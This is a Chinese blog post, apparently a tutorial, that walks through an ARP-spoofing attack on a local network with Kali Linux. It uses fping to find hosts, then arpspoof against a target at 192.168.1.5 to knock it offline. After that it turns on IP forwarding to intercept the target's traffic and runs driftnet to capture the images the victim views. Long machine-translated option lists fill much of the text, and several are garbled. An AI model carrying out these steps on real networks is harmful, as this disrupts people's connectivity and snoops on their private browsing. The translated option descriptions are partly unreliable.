标签:最大数 进程 分段 调查 配置 文件读取 class 管道 icmp
需要用到 fping工具 用-asg参数
调查选项:
-4,ipv4只能ping ipv4地址
-6——ipv6只在ping ipv6地址
-b——大小=字节数量的ping数据以字节的方式发送(默认为:56)
-B——backoff=N设置指数backoff因子到N(默认值:1。5)
——count=N计数模式:向每个目标发送N个ping信号
-f文件=文件读取目标文件的文件列表(-表示stdin)
-g——生成生成目标列表(只有在没有-f指定的情况下)
(在目标列表中给出开始和结束IP,或者是CIDR地址)
(例如,fping-g 192.168.1.0 192.168.1.255或fping-g 192.168.1.0/24)
-H,ttl=N设置了IP ttl值(用于实时跳转的时间)
——iface=iface绑定到一个特定的接口
-l——循环循环模式:永远发送ping信号
-m,全部使用提供主机名的ip(如IPv4和IPv6),使用-A
-dontfrag设置了不分段标记
-O-tos=N在ICMP包中设置了服务的类型(tos)标志
-p,-周期=MSEC间隔到一个目标(在ms)
(在循环和计数模式中,默认值:1000毫秒)
-r,重试=N的重试次数(默认值:3)
-R——随机随机分组数据(用来挫败链接数据压缩)
-S-src=IP集源地址
-t,-超时=MSEC单独的目标初始超时(默认为500毫秒,
除了-l/-c/-c,它是-p期到2000毫秒)
输出选项:
-a,活着的目标是活着的
-A-addr通过地址显示目标
-C,vcount=N和-C,以详细格式报告结果
——在每个输出行之前,时间戳打印时间戳
-e——在返回的包中运行的时间
-i-间隔=MSEC间隔发送ping包(默认值:10毫秒)
-n,名称以名称显示目标(-d是等价的)
-N-netdata输出可兼容netdata(-l-Q是必需的)
-o-停机显示了累计的宕机时间(丢失的包包间隔)
-q-安静的安静(不要显示每一个目标/每平的结果)
-Q-s=SECS与-Q相同,但每n秒显示一次
-s,统计打印最终数据
-u-无法到达的目标是无法到达的
- v,版本显示的版本
查看你扫描到的ip
开启arp欺骗用 arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
选项
- i 指定要使用的接口。
- c的主机| |
在恢复arp映射时指定使用哪个硬件地址
成形;在清理时,可以用自己的包发送数据包
地址和主机地址。发送的数据包
一个虚假的hw地址会破坏与某些特定的连接
转换/ap/桥配置,但是它更可靠
而不是使用自己的地址,这是arps的默认方式
事后清理。
- t目标
指定一个特定的主机到ARP毒药(如果没有指定的话
局域网主机)。重复指定多个主机。
-r毒害两个主机(主机和目标)以捕获两者的通信量
的方向。(只在与-t的联合中有效)
主机指定要截获数据包的主机(通常是
本地网关)。
反馈成功后靶机断网(arp攻击)
关掉进程
开启本地的ip转发
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
在进行(arp欺骗) arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
目标可以上网
使用root@kali:~# driftnet -i eth0 工具查看靶机浏览的图片信息
选项:
-h显示这个帮助信息。
- v详细操作。
- b当一个新图像被捕获时,b蜂鸣。
-i接口选择要监听的接口(默认:所有
接口)。
-f文件而不是监听接口,读取捕获
来自pcap转储文件的数据包;文件可以是命名管道
用于与Kismet或相似的用途。
-p不把监听接口设置为混乱模式。
辅助模式:不要在屏幕上显示图像,而是保存
将它们放到一个临时目录中,并在上面公布它们的名称
标准输出。
在临时目录中保存的图像的最大数量
在兼职模式。
-d目录使用指定的临时目录。
-x前缀在保存图像时使用。
-s尝试从网络中提取音频数据,
除了图像。目前,这支持MPEG数据
只有。
-S提取音频流,而不是图像。
-M命令使用给定的命令来播放MPEG音频数据
s选项;这应该处理MPEG帧
提供的标准输入。默认值:“mpg123——”。
主要参数:
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
使用举例:
1.实时监听: driftnet -i wlan0
2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
标签:最大数 进程 分段 调查 配置 文件读取 class 管道 icmp
原文地址:https://www.cnblogs.com/haozheyu/p/9212265.html